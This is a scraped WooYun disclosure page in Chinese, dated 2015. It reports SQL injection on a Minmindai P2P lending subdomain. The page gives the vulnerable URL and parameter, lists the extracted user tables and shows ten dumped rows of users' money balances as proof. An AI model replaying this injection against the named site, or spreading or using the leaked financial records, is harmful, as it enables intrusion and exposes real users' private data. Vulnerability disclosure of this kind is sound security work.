P2P安全之民民贷某站SQL注入(泄露用户的基本信息)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154528

漏洞标题：P2P安全之民民贷某站SQL注入(泄露用户的基本信息)

漏洞作者：路人甲

提交时间：2015-11-20 18:39

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-20：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-01-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

url:http://2014.minmindai.com/Test?content=sqlinject&a=index&button=%E6%9F%A5%E8%AF%A2%E9%97%AE%E9%A2%98&m=Test

漏洞证明：

根据字段的信息发现是可以查询到用户的基本信息的，包括邮箱，现金，交易记录等

| mmd_user                     |
| mmd_user_action_history      |
| mmd_user_bankcard            |
| mmd_user_card                |
| mmd_user_cert_file           |
| mmd_user_cert_history        |
| mmd_user_cert_status         |
| mmd_user_company_info        |
| mmd_user_creditline          |
| mmd_user_expand              |
| mmd_user_expand_history      |
| mmd_user_expand_integral     |
| mmd_user_expand_value        |
| mmd_user_extract             |
| mmd_user_integral            |
| mmd_user_integral_history    |
| mmd_user_login_history       |
| mmd_user_mail                |
| mmd_user_mail_sys            |
| mmd_user_money               |
| mmd_user_money_bflist        |
| mmd_user_money_finreport     |
| mmd_user_money_gfblist       |
| mmd_user_money_history       |
| mmd_user_money_nhlist        |
| mmd_user_money_wyzxlist      |
| mmd_user_money_ysblist       |
| mmd_user_notice_config       |
| mmd_user_offline_charge      |
| mmd_user_open_login          |
| mmd_user_personal_info       |
| mmd_user_sign                |
| mmd_user_weixin              |
| mmd_user_weixin_auto_reponse |
| mmd_user_weixin_chat         |
| mmd_user_weixin_from         |
| mmd_user_work_info           |
| mmd_weixin_text              |

然而用户数量才100.简直不敢相信

查看了其中的部分(10个)

看土豪们的各种炫

select * from mmd_user_money  limit 0,10 [10]:
[*] 0.00, 29693039.85, 29709110.89, 0.00, 930000.00, 0, 1411694495, 0.00, 0.00, 0.00, 0.00, 30623039.85, 1
[*] 0.00, 584395.00, 0.00, 0.00, 5.00, 0, 1411694495, 15700.55, 0.00, 584395.00, 0.00, 600100.55, 2
[*] 0.00, 700369.07, 187469.07, 0.00, 0.00, 0, 1411435213, 101416.66, 0.00, 512900.00, 0.00, 801785.73, 3
[*] 0.00, 1299133.68, 278483.68, 0.00, 60100.00, 0, 1411954087, 648185.98, 0.00, 1020650.00, 0.00, 2007419.66, 4
[*] 0.00, 100000.00, 0.00, 0.00, 413050.00, 0, 1412041670, 1299427.94, 0.00, 100000.00, 0.00, 1812477.94, 5
[*] 0.00, 95000.00, 0.00, 0.00, 0.00, 0, 1409968149, 5070.83, 0.00, 95000.00, 0.00, 100070.83, 6
[*] 0.00, 0.00, 0.00, 0.00, 0.00, 0, 1409885126, 101416.66, 0.00, 0.00, 0.00, 101416.66, 7
[*] 0.00, 200000.00, 0.00, 0.00, 500631.22, 0, 1412045216, 1113845.82, 0.00, 200000.00, 0.00, 1814477.04, 8
[*] 0.00, 359149.71, 29949.71, 0.00, 270800.00, 0, 1412037100, 1992404.98, 0.00, 329200.00, 0.00, 2622354.69, 9
[*] 0.00, 107560.00, 0.00, 0.00, 101240.00, 0, 1411891298, 395829.24, 0.00, 107560.00, 0.00, 604629.24, 10

数据仅仅是证明，并没有深入进行

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154528

漏洞标题：P2P安全之民民贷某站SQL注入(泄露用户的基本信息)

相关厂商：民民贷

漏洞作者：路人甲

提交时间：2015-11-20 18:39

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154528

漏洞标题：P2P安全之民民贷某站SQL注入(泄露用户的基本信息)

相关厂商：民民贷

漏洞作者： 路人甲

提交时间：2015-11-20 18:39

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154528"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云